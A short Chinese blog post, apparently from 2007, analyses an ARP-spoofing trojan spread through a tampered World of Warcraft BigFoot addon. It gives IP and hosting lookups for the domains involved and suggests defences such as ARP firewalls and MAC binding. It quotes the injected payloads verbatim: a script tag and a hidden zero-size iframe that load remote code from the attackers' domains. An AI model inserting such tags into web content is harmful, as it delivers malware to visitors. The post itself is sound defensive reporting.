与www.17liulan.com和www.lovemsn520.cn相关的木马病毒
arp欺骗病毒,被感染的机器,网卡设置为混杂模式,可以监听局域网内数据,并且冒充网关,更改传输的http数据包。
大部分网页加上一句<script language=javascript src=http://www.lovemsn520.cn/msn/1.js></script>
类似病毒现在多了起来(”<iframe width=’0′ height=’0′ src=’http://love.netskys.cn/yo/00.htm’></iframe>”);
来源:
[查询结果] 您的查询: [域名] www.lovemsn520.cn => 218.6.8.67
·本站主数据: 福建省 莆田市 电信
·本站辅数据: 福建省莆田电信数据中心 [提供:蜗牛在线]
·参考数据一: 福建省莆田市 电信IDC机房
·参考数据二: 福建省莆田市 电信
218.6.8.67
该网站最近一周和一月日均 IP 访问量和 PV 浏览量估算值
近一周日均IP量 近一周日均PV量 近一月日均IP量 近一月日均PV量
- - ≈ 36 ≈ 144
———————-
http://www.17liulan.com was running Microsoft-IIS on unknown when last queried at 1-Dec-2007 06:16:11 GMT - refresh now Site Report
Try out the Netcraft Toolbar! FAQ
OS Server Last changed IP address Netblock Owner
unknown Microsoft-IIS/6.0 1-Dec-2007 218.6.8.67 CHINANET fujian province network
从上面的帖子数据可以看出,这个病毒很新,不过很快,可以找到是经过被感染的魔兽世界的大脚插件发出的。
看这里:http://bbs.ngacn.com/read.php?tid=1365869
防治:
没有很好的办法,最经济的办法,安装arp防火墙,但是需要每个人都安装才有效。
当然,mac绑定也有效,这事儿只能nic去做了。。。
最后,为了您和他人的健康,希望wow玩家,去wow官方网站下载大脚插件。
Comments
还没有评论。
发表评论